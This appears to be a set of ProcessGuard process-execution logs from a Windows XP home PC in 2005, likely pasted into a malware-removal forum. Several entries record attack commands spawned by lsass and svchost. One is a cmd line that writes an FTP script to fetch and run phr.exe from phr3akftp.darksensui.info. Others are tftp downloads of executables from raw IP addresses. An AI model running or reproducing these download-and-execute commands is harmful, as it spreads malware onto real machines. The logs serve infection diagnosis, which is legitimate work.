0 47 [EXECUTION] "c:\program files\grisoft\avg free\avgwb.dat" was allowed to run [EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgw.exe" [580] [EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgwb.dat" ]Sun 09 - 10:40:47 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1328] [EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]Sun 09 - 10:42:49 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run [EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgwb.dat" [680] [EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avginet.exe" ]Sun 09 - 10:43:45 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1328] [EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" /d shell32.dll,control_rundll timedate.cpl ]Mon 10 - 10:43:59 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run [EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1136] [EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avginet.exe" /sched=5 ]Mon 10 - 10:44:08 [EXECUTION] "c:\program files\microsoft office\office\winword.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1328] [EXECUTION] Commandline - [ "c:\program files\microsoft office\office\winword.exe" ]Mon 10 - 10:45:51 [EXECUTION] "c:\windows\system32\tftp.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\svchost.exe" [708] [EXECUTION] Commandline - [ tftp.exe -i 202.124.159.172 get 221.exe ]Mon 10 - 10:52:50 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpzstc07.exe" was allowed to run [EXECUTION] Started by "c:\program files\microsoft office\office\winword.exe" [392] [EXECUTION] Commandline - [ c:\windows\system32\spool\drivers\w32x86\3\hpzstc07.exe -f"hp deskjet 5550 series" -m"hp deskjet 5550 series" ]Mon 10 - 10:52:53 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [532] [EXECUTION] Commandline - [ cmd /c echo open phr3akftp.darksensui.info 612 >appmr.dll &echo user phr klopklop >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo phr.exe >>appmr.dll &echo phr.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &phr.exe ]Mon 10 - 10:54:50 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpzstw07.exe" was allowed to run [EXECUTION] Started by "c:\program files\microsoft office\office\winword.exe" [392] [EXECUTION] Commandline - [ c:\windows\system32\spool\drivers\w32x86\3\hpzstw07.exe friendly_name="hp deskjet 5550 series" job_id="2" ]---Process Guard Log Started---Mon 10 - 11:03:43 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [524] [EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]Mon 10 - 11:03:43 [EXECUTION] "c:\program files\grisoft\avg free\avgw.exe" was allowed to run [EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1140] [EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgw.exe" /test=2 ]Mon 10 - 11:03:44 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [524] [EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]Mon 10 - 11:03:45 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1536] [EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]Mon 10 - 11:03:49 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1240] [EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]Mon 10 - 11:03:49 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1240] [EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]Mon 10 - 11:03:49 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1240] [EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]Mon 10 - 11:03:50 [EXECUTION] "c:\
0 explorer.exe" [1016] [EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]Sun 16 - 19:42:30 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1016] [EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]Sun 16 - 19:42:30 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "Unknown Process" [216] [EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]Sun 16 - 19:42:31 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1016] [EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]Sun 16 - 19:43:18 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1016] [EXECUTION] Commandline - [ c:\progra~1\mozill~1\firefox.exe -url "a:\tides.html" ]Sun 16 - 19:43:44 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1016] [EXECUTION] Commandline - [ c:\progra~1\mozill~1\firefox.exe -url "a:\atlantis.html" ]Sun 16 - 19:45:00 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1016] [EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]Sun 16 - 19:50:33 [EXECUTION] "c:\windows\explorer.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1016] [EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]Sun 16 - 19:50:46 [EXECUTION] "c:\documents and settings\dug and tania\my documents\hijack\hijackthis.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1016] [EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\hijack\hijackthis.exe" ]Sun 16 - 19:55:49 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [492] [EXECUTION] Commandline - [ cmd /c echo open phr3akftp.darksensui.info 612 >appmr.dll &echo user phr klopklop >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo phr.exe >>appmr.dll &echo phr.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &phr.exe ]Sun 16 - 19:55:58 [EXECUTION] "c:\windows\system32\tftp.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\svchost.exe" [652] [EXECUTION] Commandline - [ tftp.exe -i 202.124.170.211 get msupdate32.exe ]---Process Guard Log Started---Sun 16 - 19:59:15 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [528] [EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]Sun 16 - 19:59:15 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [528] [EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]Sun 16 - 19:59:17 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1512] [EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]Sun 16 - 19:59:20 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1272] [EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]Sun 16 - 19:59:21 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1272] [EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]Sun 16 - 19:59:22 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1272] [EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]Sun 16 - 19:59:22 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1272] [EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]Sun 16 - 19:59:22 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run [EXECUTION] Started by "c:\windows\explore
C:\Program Files\ProcessGuard\logs\pglog_11_2005.txt (232 KB, 11/11/2005 19:34:52)
0 wed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1016] [EXECUTION] Commandline - [ "c:\windows\system32\s3tray2.exe" ]Wed 09 - 19:07:16 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1016] [EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]Wed 09 - 19:07:17 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1016] [EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]Wed 09 - 19:07:17 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "Unknown Process" [1872] [EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]Wed 09 - 19:07:19 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1016] [EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]Wed 09 - 19:07:22 [EXECUTION] "c:\windows\system32\imapi.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\services.exe" [480] [EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]Wed 09 - 19:08:00 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run [EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgcc.exe" [1740] [EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avginet.exe" ]Wed 09 - 19:08:04 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1016] [EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]Wed 09 - 19:19:25 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run [EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgcc.exe" [1740] [EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avginet.exe" ]Wed 09 - 19:21:30 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [492] [EXECUTION] Commandline - [ cmd /c echo open phr3akftp.darksensui.info 612 >appmr.dll &echo user phr klopklop >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo phr.exe >>appmr.dll &echo phr.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &phr.exe ]Wed 09 - 19:22:03 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run [EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgcc.exe" [1740] [EXECUTION] Commandline - [ c:\progra~1\grisoft\avgfre~1\avginet.exe /settings 131298 ]Wed 09 - 19:22:48 [EXECUTION] "c:\program files\internet explorer\iexplore.exe" was allowed to run [EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgcc.exe" [1740] [EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe" -nohome ]Wed 09 - 19:42:40 [EXECUTION] "c:\windows\explorer.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1016] [EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]Wed 09 - 19:42:59 [EXECUTION] "c:\documents and settings\dug and tania\my documents\hijack\hijackthis.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1016] [EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\hijack\hijackthis.exe" ]Wed 09 - 19:43:11 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run [EXECUTION] Started by "c:\documents and settings\dug and tania\my documents\hijack\hijackthis.exe" [968] [EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\documents and settings\dug and tania\my documents\hijack\hijackthis.log ]Wed 09 - 19:44:00 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1016] [EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\program files\processguard\logs\p
C:\Documents and Settings\Dug And Tania\Local Settings\Temp\clipboardcache (1222 KB, 24/10/2005 19:06:16)
0 nning [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds741fc4de26fe7846a71325c3cf4490f3 ]Fri 02 - 18:32:27 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsf49c9513fb8c714c97f061c313d4cbbe ]Fri 02 - 18:32:38 [EXECUTION] "c:\program files\grisoft\avg free\avgwb.dat" was allowed to run [EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgcc.exe" [1912] [EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgwb.dat" /switchui ]Fri 02 - 19:16:38 [EXECUTION] "c:\windows\pchealth\helpctr\binaries\helpsvc.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\pchealth\helpctr\binaries\helpsvc.exe" /embedding ]Fri 02 - 19:16:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdse322dd4ea69d034095a8ce31cbd8c16a ]Fri 02 - 19:16:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsd87d725ed55ddf43b2d2a850a348b7e9 ]Fri 02 - 19:17:15 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1000] [EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]Fri 02 - 19:19:05 [EXECUTION] "c:\windows\explorer.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1000] [EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]Fri 02 - 19:20:26 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [488] [EXECUTION] Commandline - [ cmd /c echo open phr3akftp.darksensui.info 612 >appmr.dll &echo user phr klopklop >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo phr.exe >>appmr.dll &echo phr.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &phr.exe ]Fri 02 - 19:46:35 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1000] [EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" /d shell32.dll,control_rundll desk.cpl ]Fri 02 - 19:46:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds63b9778dae548549a82735d30a6f329b ]Fri 02 - 19:46:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsce7988fd05875749b273a58ea28e7fe5 ]Fri 02 - 19:48:56 [EXECUTION] "c:\windows\explorer.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1000] [EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]Fri 02 - 20:16:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds100f70ec0af9e4
0 was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1008] [EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]Sun 04 - 10:26:56 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [476] [EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]Sun 04 - 10:27:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds4a18b0adfc8e4548aa19a1f203163a9e ]Sun 04 - 10:27:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds008d02a042612745bb190c0cc19e2e3c ]Sun 04 - 10:27:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds08b197db6599b148b4e5ca7353032eb3 ]Sun 04 - 10:27:39 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds4173be42a2d6224baae1bb4caa7b2663 ]Sun 04 - 10:28:18
Sign In
Create Account
